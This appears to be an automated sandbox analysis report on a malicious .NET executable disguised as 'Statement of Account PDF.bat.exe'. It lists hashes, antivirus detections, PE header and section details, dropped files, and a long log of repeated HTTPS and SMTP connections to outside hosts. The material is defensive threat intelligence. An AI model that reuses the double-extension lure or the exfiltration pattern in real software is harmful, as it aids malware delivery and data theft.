                                                      MD5:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      SHA1:FD3E06212F9DA365C2106DCD808CAF291CCB3A2A
                                                      SHA-256:470E7BCB766A436B50D28E362621B59467B6E6AA4146B467F4175A8B5C9EAA04
                                                      SHA-512:EC42A9DE73E4E79911CF870FD3D41392B1DC5726CEB4660BA8D7BC4BBEDEE9A3E111CB5426B3D3797C8517CEBB2BDBB4E7D3A96590EE14F2BB89B4A3E286B50C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 47%
                                                      • Antivirus: Virustotal, Detection: 57%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j................0.............".... ........@.. .......................@............@.....................................O.......|.................... ..........p............................................ ............... ..H............text...H.... ...................... ..`.rsrc...|...........................@..@.reloc....... ......................@..B........................H............N......+....................................................0...........sq...}.....st...}.....st...}.....sX...}.....s....}.....sj...}.....s....}.....sj...}.....sl...}.....sR...}.....s....}.....s....}.....s]...}......}.....(.......()....*....{....(.......{&...(......(......(.....*....0............{.....{....o~.....{.....{....ox.....{.....{....ov.....{.....{....o|.....{.....{....oz.....{.....o......{.....o......{.....o......{.....o......{.....o......{#...r...p.{...
                                                      Process:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.947855789155266
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:Statement of Account PDF.bat.exe
                                                      File size:709'632 bytes
                                                      MD5:8db4915ba4e6bb27cb249554a18a9f4c
                                                      SHA1:fd3e06212f9da365c2106dcd808caf291ccb3a2a
                                                      SHA256:470e7bcb766a436b50d28e362621b59467b6e6aa4146b467f4175a8b5c9eaa04
                                                      SHA512:ec42a9de73e4e79911cf870fd3d41392b1dc5726ceb4660ba8d7bc4bbedee9a3e111cb5426b3d3797c8517cebb2bdbb4e7d3a96590ee14f2bb89b4a3e286b50c
                                                      SSDEEP:12288:lYIPXj/PqfEKyBVaLXKfjJUKJepONj9BtjWVpFZt/DAjB4Bd:lYIPesVaLXKnJeAj9BtqzFHiWX
                                                      TLSH:3CE412402AF85B67F97D73F80520255843F02A296A63FB4C2FD0A2E3257B7954B50B7B
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.................0.............".... ........@.. .......................@............@................................
                                                      Icon Hash:90cececece8e8eb0
                                                      Entrypoint:0x4ae922
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x9CBFCD6A [Fri May 2 16:20:58 2053 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      xor eax, 35455354h
                                                      xor dword ptr [edi+eax*2], esi
                                                      dec eax
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ebx+4Ah], dl
                                                      push ebx
                                                      cmp byte ptr [eax+edi+34h], al
                                                      inc ebx
                                                      inc ebx
                                                      xor al, 37h
                                                      xor eax, 00000035h
                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xae8cf | 0x4f | .text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x57c | .rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb2000 | 0xc | .reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0xacaec | 0x70 | .text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                      .text | 0x2000 | 0xac948 | 0xaca00 | cc6f8d495a151764c88415effb41004d | False | 0.9525550438993483 | data | 7.953860448849022 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc | 0xb0000 | 0x57c | 0x600 | 1f75e371351229bd6b94315dca34c3bf | False | 0.4108072916666667 | data | 4.003547176750001 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc | 0xb2000 | 0xc | 0x200 | aa8be37c15602334eb6c67566044895a | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                      RT_VERSION | 0xb0090 | 0x2ec | data | | | 0.43983957219251335
                                                      RT_MANIFEST | 0xb038c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                      DLL | Import
                                                      mscoree.dll | _CorExeMain
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Apr 26, 2024 10:32:57.959342957 CEST | 49734 | 443 | 192.168.2.4 | 104.26.12.205
                                                      Apr 26, 2024 10:32:57.959407091 CEST | 443 | 49734 | 104.26.12.205 | 192.168.2.4
                                                      Apr 26, 2024 10:32:57.959517002 CEST | 49734 | 443 | 192.168.2.4 | 104.26.12.205
                                                      Apr 26, 2024 10:32:57.990559101 CEST | 49734 | 443 | 192.168.2.4 | 104.26.12.205
                                                      Apr 26, 2024 10:32:57.990588903 CEST | 443 | 49734 | 104.26.12.205 | 192.168.2.4
                                                      Apr 26, 2024 10:32:58.258552074 CEST | 443 | 49734 | 104.26.12.205 | 192.168.2.4
                                                      Apr 26, 2024 10:32:58.258658886 CEST | 49734 | 443 | 192.168.2.4 | 104.26.12.205
                                                      Apr 26, 2024 10:32:58.278544903 CEST | 49734 | 443 | 192.168.2.4 | 104.26.12.205
                                                      Apr 26, 2024 10:32:58.278615952 CEST | 443 | 49734 | 104.26.12.205 | 192.168.2.4
                                                      Apr 26, 2024 10:32:58.279619932 CEST | 443 | 49734 | 104.26.12.205 | 192.168.2.4
                                                      Apr 26, 2024 10:32:58.323865891 CEST | 49734 | 443 | 192.168.2.4 | 104.26.12.205
                                                      Apr 26, 2024 10:32:58.380043983 CEST | 49734 | 443 | 192.168.2.4 | 104.26.12.205
                                                      Apr 26, 2024 10:32:58.420130968 CEST | 443 | 49734 | 104.26.12.205 | 192.168.2.4
                                                      Apr 26, 2024 10:32:58.577439070 CEST | 443 | 49734 | 104.26.12.205 | 192.168.2.4
                                                      Apr 26, 2024 10:32:58.577573061 CEST | 443 | 49734 | 104.26.12.205 | 192.168.2.4
                                                      Apr 26, 2024 10:32:58.577667952 CEST | 49734 | 443 | 192.168.2.4 | 104.26.12.205
                                                      Apr 26, 2024 10:32:58.584738970 CEST | 49734 | 443 | 192.168.2.4 | 104.26.12.205
                                                      Apr 26, 2024 10:32:59.556538105 CEST | 49736 | 587 | 192.168.2.4 | 50.87.195.61
                                                      Apr 26, 2024 10:32:59.753226042 CEST | 587 | 49736 | 50.87.195.61 | 192.168.2.4
                                                      Apr 26, 2024 10:32:59.753345013 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.070991039 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.074568987 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.271383047 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.271923065 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.470662117 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.472225904 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.680167913 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.680197001 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.680213928 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.680294991 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.715018034 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.911931992 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.914824963 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:01.111970901 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.113197088 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:01.312346935 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.312803030 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:01.551106930 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.620796919 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.624671936 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:01.822881937 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.823427916 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.823704004 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.062201977 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.074182034 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.074415922 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.271310091 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.271348000 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.271990061 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.272042990 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.272079945 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.272104979 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.469218016 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.469372988 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.469969988 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.511368036 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:04.312026024 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.312068939 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.312144041 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.316140890 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.316154957 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.575211048 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.575318098 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.576860905 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.576869011 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.577203989 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.620735884 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.670937061 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.712132931 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.904771090 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.904844999 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.904920101 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.907715082 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:05.642848015 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:05.839730978 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:05.839852095 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.113437891 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.117778063 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.314546108 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.317152977 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.515319109 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.515831947 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.732532978 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.732641935 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.732681990 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.732770920 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.737844944 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.935890913 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.980132103 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:07.030622005 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:07.227381945 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:07.291393042 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:07.315216064 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:07.512069941 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:07.512523890 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:07.711711884 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:07.712497950 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:07.914414883 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:07.964488029 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:09.198209047 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:09.435003042 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:09.449403048 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:09.460222006 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:09.656719923 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:09.656784058 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:09.676700115 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:09.677305937 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:09.677371025 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:09.677439928 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:09.878810883 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:09.879008055 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:09.879045010 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:09.879077911 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:09.882457018 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:09.933244944 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:13.664582968 CEST49750443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:13.664630890 CEST44349750104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:13.664823055 CEST49750443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:13.674757004 CEST49750443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:13.674768925 CEST44349750104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:13.934699059 CEST44349750104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:13.934775114 CEST49750443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:13.938417912 CEST49750443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:13.938425064 CEST44349750104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:13.938688993 CEST44349750104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:13.980173111 CEST49750443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:14.207614899 CEST49750443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:14.252116919 CEST44349750104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:14.376785994 CEST44349750104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:14.376890898 CEST44349750104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:14.376965046 CEST49750443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:14.379509926 CEST49750443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:14.897726059 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:15.100383043 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:15.100506067 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:15.554121971 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:15.554326057 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:15.751154900 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:15.751425982 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:15.950134993 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:15.950587034 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:16.160096884 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:16.160130978 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:16.160144091 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:16.160258055 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:16.161843061 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:16.358247042 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:16.363389015 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:16.559710979 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:16.560132980 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:16.756644964 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:16.757729053 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:16.956267118 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:16.956595898 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:17.152975082 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:17.153228045 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:17.391088009 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:17.405121088 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:17.405399084 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:17.602688074 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:17.602720976 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:17.603652000 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:17.603754044 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:17.603820086 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:17.603836060 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:17.801412106 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:17.801445007 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:17.801462889 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:17.801959991 CEST5874975350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:17.856628895 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:21.585676908 CEST49755443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:21.585772038 CEST44349755104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:21.585871935 CEST49755443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:21.588932037 CEST49755443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:21.588968992 CEST44349755104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:21.880594969 CEST44349755104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:21.880698919 CEST49755443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:21.882520914 CEST49755443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:21.882546902 CEST44349755104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:21.882896900 CEST44349755104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:21.933233976 CEST49755443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:21.941553116 CEST49755443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:21.988127947 CEST44349755104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:22.210608006 CEST44349755104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:22.210691929 CEST44349755104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:22.210783005 CEST49755443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:22.213233948 CEST49755443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:22.817615986 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:23.014687061 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:23.014792919 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:23.243947983 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:23.244153023 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:23.457655907 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:23.457859993 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:23.656215906 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:23.657335043 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:23.727190018 CEST49753587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:23.865221977 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:23.865246058 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:23.865261078 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:23.865322113 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:23.868221045 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:24.065463066 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:24.070982933 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:24.268199921 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:24.268518925 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:24.466063023 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:24.476833105 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:24.675434113 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:24.675767899 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:24.889815092 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:24.933245897 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:25.084201097 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:25.322104931 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:25.329432964 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:25.329612017 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:25.526571035 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:25.526633978 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:25.527801991 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:25.527976036 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:25.528012991 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:25.528089046 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:25.763251066 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:25.763304949 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:25.763341904 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:25.763377905 CEST5874975750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:25.808232069 CEST49757587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:34:39.386992931 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:34:39.583981037 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:34:39.584615946 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:34:39.725550890 CEST49759587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:34:39.790819883 CEST49760587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:34:39.922826052 CEST5874975950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:34:39.922935009 CEST49759587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:34:39.987035990 CEST5874976050.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:34:39.987171888 CEST49760587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:34:40.195323944 CEST5874975950.87.195.61192.168.2.4
